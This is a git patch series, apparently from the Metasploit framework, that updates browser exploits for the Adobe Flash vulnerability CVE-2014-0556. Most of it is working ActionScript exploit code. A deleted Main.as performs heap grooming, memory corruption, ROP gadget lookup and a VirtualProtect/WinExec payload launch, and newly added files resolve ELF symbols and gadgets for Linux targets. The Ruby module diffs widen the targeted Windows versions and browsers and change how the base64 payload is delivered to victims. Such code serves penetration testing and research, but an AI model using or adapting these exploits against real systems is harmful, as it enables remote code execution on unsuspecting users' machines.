zl^fB5yS9()PvdP?+QMmKvLN$870#S41sSaC$OS)G0JrgafU(WIifD^f(!ku8!{&zU
z7iyAlU(7&`iY)!5fpC@uRfz7H=?Gf*8S8xxkGe(%!sH7}Cb7RK=A9c)(G%rsf88Cm
z%!K4#2@xYP@l)vujyf4r+lWE=m65mV#J(j(-$;vsd<|&WEA(+r@NAdZ;+!g*DBIyJ
z@eLdketwCy92GxbGOr`yzYG`JbWV$zv{1VKYTzU6wDs=*&UyvcBl0m(8Q7GnHZ!TZ
z^-w8D*%ITnq9w0H6USC4#zT!Ye{kyx;pjDY^}LD7HalE2^0YwmCDQPhc6bNZ25W5y
z-DpTU#(~wF@tpo71EF$ly$lwKbZ-FsBBLl}zz0w+Qh?c_Km9rJpT8jbXIAI_hd_PP
zK$o$<&S0Gae^9I~ar&mn_-Nh9eK}20{39wcRZ=ZJU^0R_w0)Q*Yd%9Uf7hx2Ie|U4
z81Gp3dAQ0h*nIgOWC3!L%@-htExP({c8I^4*|Y@XjKCnRX*!hqcgGSrQegM~8K8&e
zzI+sqPz1s!c66hg7U}YS;zfWPoh{dCfqW7L2(Y-3Gu)@GGl?3(0^Bx}U%-i9RJ#R7
zVQBV|Z;6(667rmn-<weFf25dqQP^JYb+rwXOG_~a*BkcHcz#d3M|5csch4*Av%j&|
zov0fY)_f##uBMC+Dhj=T1CrhYUWd3tE8<K5*81(*(jj=pgl^JVKq8KYa;{c%bEBCp
z<TFhA*sEaY{l$NJ0C3GUh<Q~&7%$`tya<w}Z#lu~5jGe?h{9Wbf54VwfmM2$YKQ;}
zedTqvAbCr0Rx_Fa+HsKR;-%ZTN?%2lO+Z3W==l~&Ar2;OU8aMb{1;b(<!7;;q!LdG
zn;sm3U0!i$4vc9-Ggqd8u+;O<PqciSY!yM=Y{r8YA0MmJHmH~e>sRY%1gaYiwr2dx
z+IErN@Aa_!cc+X3f2QF$Ua{%(Fgm$HCb^>T^PaPO2{AU=Nt$F`r%j!j=FizNUeVlu
zmBN~x9uY?Gw^8{Nd6Ktce-r@+caRjc>6=k)v6vn`T-L`F@ddWqI^xu7aqs(paxvTd
z@9{N(6m@%6<8Noh!%a|r+lIH1bvUdQH#q5Qx-ru+uOOb0f6{jTtC84#-0kI%2K)q1
z^66RShEi?C<rm|asjy=8MG?7A$$xew66t)B;_pEOlP$?*;L4C-Wf~J*1|^jc0&_kM
z#f57?H=D@$N^C__8Gj<IoowvVsh@QGsqo1YY$l<4+9k=PY}FSO!*uI>WA};Iau=l(
zwrcYHtm9}Hf5Ey)&qnUK87Q*<T#uBq%~7L$&5)f4?*}sc9@nFcEu%1l_t@SUOaF_=
z0NeQ-(7{%|z50-C=L!#Lwv1Fw!6d*$y=maMO?EStvNjpU=4K`l#Qfz>%>!n6tgb^_
z)dTV?nHTR)Fh`ES=I)<bbM};(WV=k@@jzve+~I?^e**V!`*Y^9OpYd=`iz_aF@C+6
z<DruR-K!OifFC?s2{{Cfby}_#ul69>3H%r_@2-n~fVjo!CUKPA(#02iYCR#PISXR^
z4wzOlJrlOq&2k`_mIkhVg4gT=mhbZ&$=+99@$eZaDS1<ut%<=9`7tNHO}FH(38uRj
z<V+h4e+;O|O-fv8b}`7XHViHo4Of^WLBB{pJStGMh&7Iv1nb!)DhXQ+7>|B(SG0jJ
zDsO<~GBj0r5ylK=QWzx>->_f3PFOa^zT$Ry0#-XEz2^Hu@Q6eLVlf_&de@**76p)7
zmB18x9XNmI<8qR2`r?w3;|-`WTfa)%hfw??e=u17UF}y>jrZ@;#$yl65DSz8VyaoS
zunT?JF@UEF0&9jnf>vqu0sI$0bNo-694w}Mf{hcw&TvZRX~j4`!h%hf%y$Y%L}O3q
z**fJGuj@^Cw$GkFeaolBK6z4>GxiZiDE3U3$q?9h^9Z(Unhe!dnV3fze8=A>r}p%v
ze`99h+m36FEilc+IDx8K{qwNatvw=XFO<IXk*6X$SUN=QCoA5Un>lI}AXLlX35-cA
zD}Le?G=vJyMeR4Wg%r_@OlE+>2=h8_G0xj0mcgcAYB!b}ocUJR4=99aq&qK&66v;r
zX-AA|IG~0kQ(8Ar;h|{pyfSMKx~I!Xe}vCOjD6W$Yy#!s=iV%DU%FYcKaRzKClOb?
zLy?hb`Z{Klya6+Z>lkpLYW+3PADv>t@G(vNz-H*P$CblZ_{yy<gO5#Q>dYQd<G@5S
zoF3Kpge3QNukCms?7ls}?q>KFd}DgSS18?`53}M-ZxTI<{TStVyU*QxTr26^e-qU!
zmi}+s*mQLQ`XwBe;#w1EtIH8OexH0Ixs4AL>Nt8)iWJldZKDp#f=2l~L}@r63R=ZA
z6m=(MVyV|Zg^N}>ptUi?ziEeWjulJ*1gCKatL(%jEIpR<(5F^RZ#9k7pTD|(+8zD=
zV~xcqsMgYaenlDRIR#wCK{w%Se}a*8&#G7n-Q2JychDR=^;x(G_h#>E3`KHy8_^t?
zL`5VJSK6)kLbMqNd~p|0;d^oHvhC#~Za}L{g7cExhW6&^JP@5=250mnUZM*oIqU9B
zqa;tRymtX~=Ii8~hdf)dz>zK2@0>*|^ms$tS{R5Qd)g%zierxzr%HhOe_KSSthM<(
zFAN|>Z5E_Z1n%Z7ZnTNnRix5GDxMF%_#upv&l;zhd27Y^j{#LM6@h^6u2C6}NhTky
zga$7F4NaQqKD0D+VT|f?IT;MJuuO;rmpP&yjTs4o$2)v6nx3L;IIN58=EcDOatLpf
zseWl@Pe;~G9g{RoMtyYDe+_)hBbNgV4fnei?rJDJb&RbizrZ&#R*RQIR=7Oz%PKc0
zF8fNWQ&ViI+4udQEyAdZGKQ?srI^~)W_MEpi)>97ym~!NcG%!wv|CXfSP5}j6#x;R
z)R#cK^`a%T0tM2lsU+GD_`i!kN43=HF_Q>$98$`hT0kgcisdk0e~}*CIY@7td50jG
zR*oQ#bgM;fCV=X?F_r*pvkD~Ix&toNaDBt{GA-|T18)lrZv~)aQfFhBu?8%Uu%@XL
zvaxx6$;Nf4LsuRpVHI+0NGZ@@WVh|683OFei;q8V8@%=5(TP%i_2^bir<ycL{*D5y
z@0GSlEU9tg<2|s)e+I;M>&|qy&);U??6dZ?eF#oZSP1$Ex2!R`QpcPdgd^h>caAg)
zO?<Vt8GbKRL_?b2`%(3qpMZZEU&>oEl7_%Rtct?Cd}?E-|Lv2-MI$oBllnc$X)RzQ
z)i3Uh>cXg|7(V~AHgYb_gQy*+?(_QNhDiv*EJF3up!<E7e}=v8AP&8Vg)&9`p=)6#
zhXx2kLsWNT7p>*dU%A#YWWc!o=zNd{?oi(zD>_!pe~Wcj@RyM9xG(p7)G2Tjm{+gF
zo_gvy<z88UMHXOD9zHnM>6R*&mZ=#_SfA+&0+>j&I9A$DLLQGJ;rmQa4#fvg!lfOa
z)JRx`0HHuVe+Fe^{Z&?R)!){dm4VE)+vsHAn8lQlg9pSs?_<K402zJm+jmK4)+E7z
zPB_x5S<wuGQ6GbqrPaD;Qbq@2>i{V+JV~<SW{=lQXGFyA;w^JXzC~19SF_m$GgnLp
z{u(ScHE%=r2<v75@m4tfN_FLW=+XorZ!reEHXH$#1Zn#pU4Nw%RNvQ|^QSgE@`o7p
zek*rAt5!m1Hd}>+nU>;4^gCeLb}U0tRV>@&>DGU#gGmWZlG<tGp@dQ89vW#tLb1U&
z6D-}kcgHs$@(w(epi)DV*mQTEzNj=W#jFaNcgvoc`sOZai!bp+B#l*fXZys$4RyS8
z@8g2dsEtGqz<-M~_~3h;i0>spgK~ma8_kgyJKVxlq1NmO;qCTkcH&faZvCPT)<50x
zo9kjoJawSZy=4IhvP?!#wGr$pE%UL`tyV4NcqOyf2=8T+@OeJi?B+`S@%^taGC~L|
zYg1ld&3-%a6(NKP;z^II(9MgMR5&6B7_~al<Nv=#{(o@)2xfJj+-Odw!phvL+-lig
zOn7gWfeR?J41F&3)Ahm{-)a((7Yf7K!Y-2#V}<yW2=Jjjl=mSH$k7%?WqO>6bZMQ@
z1zmvHM}>&mF^aRU2}`hBSgIXpvLr_=k4}G~<8eWGCExS{LKNSYOU%%@nIP`Obtv68
z<aL50Eq~Y_)dvy9nBZQO`bE~U)|~!Tvol&yR^?Kk*&Q)aJqGI9D_hfrFvKk?6bRKq
zfP*fkIMxt&JIC5oyATXqC9)zk70x!(trWBDx&X=V-Xi<Oe1T$|Fg9EM2+9ZnJ~z6I
zix=a?jJ;!V=sPzH#_TFo+7})}M@*D(+G}ml`G2i;WhvkLejY3?_hTJo(T0bXL(TmN
z3pHpqC=3R=c6pqRl-#75%ND#!GS2u)pFMg<?$h)k?OTsn>B$^w+2HCE6w~Bqh9k9V
zYguAR<L7(EXT}sz{Opr9qF4-L>=i4!pASa?p{*VF#QC*Y6e=;|g7`&q;208v5RFey
zbAQ>k(x5Ymv{aHBW!-$WMO6T-mTSpUBZxth+#~2E#cR1?-SU&Cs7)PtelxJgmB_*o
zk(p{_s{>KI`JvV$cljP}ET(YW79ZVte_uKxL9fWdQ1sIPcJ1=F8!=F#rmy`)qrNY3
zArjXzXQbUbbN*d%(A>A(O}5`KcqtwdZh!hcG=6$vaGg|_S(-mp1!ojSd@y%Yf?4m@
zz-lo;Ddi~!J)tNNRVb4h-8G{_N`!?=_$z~#pQE&(M8jj|U87W6u3`S{ihZ;OuF*lF
zGos%z$S;<BqRw%8k#RfeC3Hh}@99qeZtBPUCmYTQ%e)><7A2xzkyyVX5v|-Xo_{P(
zM2|X0i+t+$$Tv$LLZU@SJ7v!x86f`Cizj4}E&$><6L{vyYKNr^6!kWmw5hw!ve_65
z(fvzg<9xcPcY3rsdw!fgL;H29Z<sTgR3@3H$%wa|{ewwQkW&`N>vyO65MIf)fIA9W
z{%2EhaD5NgbgLnilcYFDJ#&IDm45<w?5P`qWC<}t)O$oqy1Uf>KWUfw4K;-af{_K%
zrLxq?)YHjc88~3k3aX%SW;jDTGF@gmI7+)AZ#(AJzf5X`oEK-<Yn8WEt(4Ss`45QG
zZX2gPS<KB+?sQDVZ(>IRkKH0JHN43eAr>q=eWP`EL~OYw@XU9+DNatgh!gWevTD(?
Q(c7Jvw{Q>9|NC(8C<-(XjsO4v

diff --git a/external/source/exploits/CVE-2014-0556/Main.as b/external/source/exploits/CVE-2014-0556/Main.as
deleted file mode 100755
index da6482075c..0000000000
--- a/external/source/exploits/CVE-2014-0556/Main.as
+++ /dev/null
@@ -1,185 +0,0 @@
-// Build how to:
-// 1. Download the AIRSDK, and use its compiler.
-// 2. Download the Flex SDK (4.6)
-// 3. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
-//      (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
-// 4. Build with: mxmlc -o msf.swf Main.as
-
-// Original code by @hdarwin89 // http://hacklab.kr/cve-2014-0556-%EB%B6%84%EC%84%9D/
-// Modified to be used from msf
-
-package
-{
-	import flash.display.Sprite
-	import flash.display.BitmapData
-	import flash.geom.Rectangle
-	import flash.utils.ByteArray
-	import flash.display.LoaderInfo
-	import mx.utils.Base64Decoder
-
-	public class Main extends Sprite 
-	{
-		private var bv:Vector.<ByteArray> = new Vector.<ByteArray>(12800)
-		private var uv:Vector.<Object> = new Vector.<Object>(12800)
-		private var bd:BitmapData = new BitmapData(128, 16)
-		private var i:uint = 0
-
-		public function Main() 
-		{
-			var b64:Base64Decoder = new Base64Decoder()
-			var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
-			var pattern:RegExp = / /g;
-			b64_payload = b64_payload.replace(pattern, "+")
-			b64.decode(b64_payload)
-			var payload:String = b64.toByteArray().toString()
-			
-			for (i = 0; i < bv.length; i++) {
-				bv[i] = new ByteArray()
-				bv[i].length = 0x2000
-				bv[i].position = 0xFFFFF000
-			}
-
-			for (i = 0; i < bv.length; i++)
-				if (i % 2 == 0) bv[i] = null
-
-			for (i = 0; i < uv.length; i++) {
-				uv[i] = new Vector.<uint>(1022)
-			}
-			
-			bd.copyPixelsToByteArray(new Rectangle(0, 0, 128, 16), bv[6401])
-			
-			for (i = 0; ; i++)
-				if (uv[i].length == 0xffffffff) break
-			
-			for (var i2:uint = 1; i2 < uv.length; i2++) {
-				if (i == i2) continue
-				uv[i2] = new Vector.<Object>(1014)
-				uv[i2][0] = bv[6401]
-				uv[i2][1] = this
-			}
-			
-			uv[i][0] = uv[i][0xfffffc03] - 0x18 + 0x1000
-			bv[6401].endian = "littleEndian"
-			bv[6401].length = 0x500000
-			var buffer:uint = vector_read(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 8) + 0x100000
-			var main:uint = uv[i][0xfffffc09] - 1
-			var vtable:uint = vector_read(main)
-			vector_write(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 8)
-			vector_write(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 16, 0xffffffff)
-			byte_write(uv[i][0] + 4, byte_read(uv[i][0] - 0x1000 + 8))
-			byte_write(uv[i][0])
-			
-			var flash:uint = base(vtable)
-			var winmm:uint = module("winmm.dll", flash)
-			var kernel32:uint = module("kernel32.dll", winmm)
-			var virtualprotect:uint = procedure("VirtualProtect", kernel32)
-			var winexec:uint = procedure("WinExec", kernel32)
-			var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash)
-			var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash)
-
-			byte_write(buffer + 0x30000, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable
-			byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main
-			byte_write(0, "\x89\x03", false) // mov [ebx], eax
-			byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
-
-			byte_write(buffer + 0x100, payload, true)
-			byte_write(buffer + 0x20070, xchgeaxespret)
-			byte_write(buffer + 0x20000, xchgeaxesiret)
-			byte_write(0, virtualprotect)
-
-			// VirtualProtect
-			byte_write(0, winexec)
-			byte_write(0, buffer + 0x30000)
-			byte_write(0, 0x1000)
-			byte_write(0, 0x40)
-			byte_write(0, buffer + 0x80)
-
-			// WinExec
-			byte_write(0, buffer + 0x30000)
-			byte_write(0, buffer + 0x100)
-			byte_write(0)
-
-			byte_write(main, buffer + 0x20000)
-			this.toString()
-		}
-		
-		private function vector_write(addr:uint, value:uint = 0):void
-		{
-			addr > uv[i][0] ? uv[i][(addr - uv[i][0]) / 4 - 2] = value : uv[i][0xffffffff - (uv[i][0] - addr) / 4 - 1] = value
-		}
-
-		private function vector_read(addr:uint):uint
-		{
-			return addr > uv[i][0] ? uv[i][(addr - uv[i][0]) / 4 - 2] : uv[i][0xffffffff - (uv[i][0] - addr) / 4 - 1]
-		}
-		
-		private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void
-		{
-			if (addr) bv[6401].position = addr
-			if (value is String) {
-				for (var i:uint; i < value.length; i++) bv[6401].writeByte(value.charCodeAt(i))
-				if (zero) bv[6401].writeByte(0)
-			} else bv[6401].writeUnsignedInt(value)
-		}
-
-		private function byte_read(addr:uint, type:String = "dword"):uint
-		{
-			bv[6401].position = addr
-			switch(type) {
-				case "dword":
-					return bv[6401].readUnsignedInt()
-				case "word":
-					return bv[6401].readUnsignedShort()
-				case "byte":
-					return bv[6401].readUnsignedByte()
-			}
-			return 0
-		}
-		
-		private function base(addr:uint):uint
-		{
-			addr &= 0xffff0000
-			while (true) {
-				if (byte_read(addr) == 0x00905a4d) return addr
-				addr -= 0x10000
-			}
-			return 0
-		}
-
-		private function module(name:String, addr:uint):uint
-		{
-			var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80), i:int = -1
-			while (true) {
-				var entry:uint = byte_read(iat + (++i) * 0x14 + 12)
-				if (!entry) throw new Error("FAIL!");
-				bv[6401].position = addr + entry
-				if (bv[6401].readUTFBytes(name.length).toUpperCase() == name.toUpperCase()) break
-			}
-			return base(byte_read(addr + byte_read(iat + i * 0x14 + 16)))
-		}
-
-		private function procedure(name:String, addr:uint):uint
-		{
-			var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78)
-			var numberOfNames:uint = byte_read(eat + 0x18)
-			var addressOfFunctions:uint = addr + byte_read(eat + 0x1c)
-			var addressOfNames:uint = addr + byte_read(eat + 0x20)
-			var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24)
-			for (var i:uint = 0; ; i++) {
-				var entry:uint = byte_read(addressOfNames + i * 4)
-				bv[6401].position = addr + entry
-				if (bv[6401].readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break
-			}
-			return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4)
-		}
-
-		private function gadget(gadget:String, hint:uint, addr:uint):uint
-		{
-			var find:uint = 0
-			var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50)
-			var value:uint = parseInt(gadget, 16)
-			for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break
-			return addr + i
-		}
-	}
-}
diff --git a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
index f95e2f8dba..1182b2f2b7 100644
--- a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
+++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = GreatRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
 
diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
index 2b401c731b..fccecf14f9 100644
--- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = GreatRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
 
diff --git a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb
index dfae2693d6..77e8ce5cbe 100644
--- a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb
+++ b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb
@@ -6,9 +6,8 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = GreatRanking
 
-  include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::BrowserExploitServer
 
   def initialize(info={})
@@ -47,9 +46,12 @@ class Metasploit3 < Msf::Exploit::Remote
       'BrowserRequirements' =>
         {
           :source  => /script|headers/i,
-          :os_name => OperatingSystems::Match::WINDOWS_7,
-          :ua_name => Msf::HttpClients::IE,
-          :flash   => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <=  Gem::Version.new('14.0.0.176') },
+          :os_name => lambda do |os|
+            os =~ OperatingSystems::Match::WINDOWS_7 ||
+              os =~ OperatingSystems::Match::WINDOWS_81
+          end,
+          :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },
+          :flash   => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <=  Gem::Version.new('14.0.0.179') },
           :arch    => ARCH_X86
         },
       'Targets'             =>
@@ -82,17 +84,18 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit_template(cli, target_info)
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
     target_payload = get_payload(cli, target_info)
-    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
-    b64_payload = Rex::Text.encode_base64(psh_payload)
+    b64_payload = Rex::Text.encode_base64(target_payload)
+    platform_id = 'win'
+    os_name = target_info[:os_name]
 
     html_template = %Q|<html>
     <body>
     <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
     <param name="movie" value="<%=swf_random%>" />
     <param name="allowScriptAccess" value="always" />
-    <param name="FlashVars" value="sh=<%=b64_payload%>" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
     <param name="Play" value="true" />
-    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
     </object>
     </body>
     </html>

From 51d98e1008655d2e96197fe3902778c52289fa01 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 4 Jun 2015 18:34:08 -0500
Subject: [PATCH 0317/1013] Update AS code

---
 external/source/exploits/CVE-2014-0556/Elf.as | 235 +++++++++++
 .../source/exploits/CVE-2014-0556/Exploit.as  |  83 ++++
 .../CVE-2014-0556/ExploitByteArray.as         |  85 ++++
 .../exploits/CVE-2014-0556/ExploitVector.as   |  74 ++++
 .../exploits/CVE-2014-0556/Exploiter.as       | 399 ++++++++++++++++++
 .../source/exploits/CVE-2014-0556/Logger.as   |  32 ++
 external/source/exploits/CVE-2014-0556/PE.as  |  72 ++++
 7 files changed, 980 insertions(+)
 create mode 100644 external/source/exploits/CVE-2014-0556/Elf.as
 create mode 100755 external/source/exploits/CVE-2014-0556/Exploit.as
 create mode 100644 external/source/exploits/CVE-2014-0556/ExploitByteArray.as
 create mode 100644 external/source/exploits/CVE-2014-0556/ExploitVector.as
 create mode 100644 external/source/exploits/CVE-2014-0556/Exploiter.as
 create mode 100644 external/source/exploits/CVE-2014-0556/Logger.as
 create mode 100644 external/source/exploits/CVE-2014-0556/PE.as

diff --git a/external/source/exploits/CVE-2014-0556/Elf.as b/external/source/exploits/CVE-2014-0556/Elf.as
new file mode 100644
index 0000000000..ee7283c61c
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0556/Elf.as
@@ -0,0 +1,235 @@
+package
+{
+    public class Elf
+    {
+        private const PT_DYNAMIC:uint = 2
+        private const PT_LOAD:uint = 1 
+        private const PT_READ_EXEC:uint = 5
+        private const DT_SYMTAB:uint = 6
+        private const DT_STRTAB:uint = 5
+        private const DT_PLTGOT:uint = 3
+
+        private var e_ba:ExploitByteArray
+        // elf base address
+        public var base:uint = 0
+        // program header address
+        public var ph:uint = 0
+        // number of program headers
+        public var ph_size:uint = 0
+        // program header entry size
+        public var ph_esize:uint = 0
+        // DYNAMIC segment address
+        public var seg_dynamic:uint = 0
+        // DYNAMIC segment size
+        public var seg_dynamic_size:uint = 0
+        // CODE segment address
+        public var seg_exec:uint = 0
+        // CODE segment size
+        public var seg_exec_size:uint = 0
+        // .dynsyn section address
+        public var sec_dynsym:uint = 0
+        // .synstr section address
+        public var sec_dynstr:uint = 0
+        // .got.plt section address
+        public var sec_got_plt:uint = 0
+         
+        public function Elf(ba:ExploitByteArray, addr:uint) 
+        {
+            e_ba = ba
+            set_base(addr)
+            set_program_header()
+            set_program_header_size()
+            set_program_header_entry_size()
+            set_dynamic_segment()
+            set_exec_segment()
+            set_dynsym()
+            set_dynstr()
+            set_got_plt()
+        }
+
+        public function external_symbol(name:String):uint {
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+            var got_plt_index:uint = 0
+
+            for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
+                }
+                if (st_info != 0x11) {
+                    got_plt_index++
+                }
+            }
+            throw new Error()  
+        }
+
+        public function symbol(name:String):uint {           
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+
+            for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return base + st_value
+                }
+            }
+            throw new Error()  
+        }
+
+
+        public function gadget(gadget:String, hint:uint):uint
+        {
+            var value:uint = parseInt(gadget, 16)
+            var contents:uint = 0
+            for (var i:uint = 0; i < seg_exec_size - 4; i++) {
+                contents = e_ba.read(seg_exec + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return seg_exec + i
+                } 
+                if (hint != 0xffffffff && value == (contents & hint)) { 
+                    return seg_exec + i
+                }
+            }
+            throw new Error()
+        } 
+ 
+        private function set_base(addr:uint):void
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (e_ba.read(addr) == 0x464c457f) {
+                    base = addr
+                    return
+                }
+                addr -= 0x1000
+            }
+            
+            throw new Error()
+        }  
+ 
+        private function set_program_header():void
+        {
+            ph = base + e_ba.read(base + 0x1c)
+        }
+    
+        private function set_program_header_size():void
+        {
+            ph_size = e_ba.read(base + 0x2c, "word")
+        } 
+
+        private function set_program_header_entry_size():void
+        {
+            ph_esize = e_ba.read(base + 0x2a, "word")
+        }
+    
+        private function set_dynamic_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                if (p_type == PT_DYNAMIC) {
+                    seg_dynamic = base + e_ba.read(entry + 8)
+                    seg_dynamic_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+
+            throw new Error()
+        }
+
+        private function set_exec_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+            var p_flags:uint = 0
+            
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                p_flags = e_ba.read(entry + 0x18)
+                if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
+                    seg_exec = base + e_ba.read(entry + 8)
+                    seg_exec_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+ 
+        private function set_dynsym():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_SYMTAB) {
+                    sec_dynsym = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_dynstr():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_STRTAB) {
+                    sec_dynstr = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_got_plt():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_PLTGOT) {
+                    sec_got_plt = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0556/Exploit.as b/external/source/exploits/CVE-2014-0556/Exploit.as
new file mode 100755
index 0000000000..e14fceac94
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0556/Exploit.as
@@ -0,0 +1,83 @@
+// Build how to:
+// 1. Download the AIRSDK, and use its compiler.
+// 2. Download the Flex SDK (4.6)
+// 3. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
+//      (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
+// 4. Build with: mxmlc -o msf.swf Main.as
+
+// Original code by @hdarwin89 // http://hacklab.kr/cve-2014-0556-%EB%B6%84%EC%84%9D/
+// Modified to be used from msf
+
+package
+{
+	import flash.display.Sprite
+	import flash.display.BitmapData
+	import flash.geom.Rectangle
+	import flash.utils.ByteArray
+	import flash.display.LoaderInfo
+	import mx.utils.Base64Decoder
+
+	public class Exploit extends Sprite 
+	{
+        private var uv:Vector.<uint>
+        private var exploiter:Exploiter
+        private var b64:Base64Decoder = new Base64Decoder()
+        private var payload:ByteArray
+        private var platform:String
+        private var os:String
+		private var bv:Vector.<ByteArray> = new Vector.<ByteArray>(12800)
+		private var ov:Vector.<Object> = new Vector.<Object>(12800)
+		private var bd:BitmapData = new BitmapData(128, 16)
+
+		public function Exploit() 
+		{
+            var i:uint 
+            platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+            os = LoaderInfo(this.root.loaderInfo).parameters.os
+            var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+            var pattern:RegExp = / /g;
+            b64_payload = b64_payload.replace(pattern, "+")
+            b64.decode(b64_payload)
+            payload = b64.toByteArray()
+
+			for (i = 0; i < bv.length; i++) {
+				bv[i] = new ByteArray()
+				bv[i].length = 0x2000
+				bv[i].position = 0xFFFFF000
+			}
